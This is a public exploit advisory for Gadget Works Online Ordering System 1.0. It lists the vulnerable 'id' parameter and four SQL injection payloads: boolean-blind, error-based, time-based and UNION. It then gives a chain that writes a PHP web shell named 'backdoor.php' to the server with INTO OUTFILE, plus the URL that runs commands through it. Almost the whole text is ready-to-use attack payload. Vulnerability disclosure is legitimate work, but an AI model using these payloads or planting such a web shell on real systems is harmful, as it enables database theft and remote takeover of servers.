Authored by Richard Jones

Gadget Works Online Ordering System version 1.0 remote SQL injection to remote code execution exploit.

# Exploit Title: Gadget works online ordering system - Authentication Bypass SQLi
# Date: 03/05/2021
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/13093/gadget-works-online-ordering-system-phpmysqli.html
# Version: 1.0
# Tested on: Windows 10 build 19041 + xampp 3.2.4

SQL Injection details:

Endpoint:
*replace IP with the website IP

http://IP/philosophy/index.php?q=single-item&id=1

Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: q=single-item&id=(SELECT (CASE WHEN (5628=5628) THEN 1 ELSE (SELECT 9686 UNION SELECT 8857) END))

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: q=single-item&id=1 OR (SELECT 3320 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(3320=3320,1))),0x716a706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: q=single-item&id=1 AND (SELECT 2585 FROM (SELECT(SLEEP(5)))BrmF)

Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: q=single-item&id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71787a7671,0x67664845794943545a51517775675672466965636572474d435a48727a58646750687253474d766d,0x716a706271),NULL-- -


SQL Injection to RCE

*replace IP with websites IP

http://IP/philosophy/index.php?q=single-item&id=1+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,"<%3fphp+echo+shell_exec($_GET['cmd'])%3b%3f>",NULL+into+outfile+"C%3axampphtdocsbackdoor.php"--+-


RCE execution point:
http://IP/backdoor.php?cmd=whoami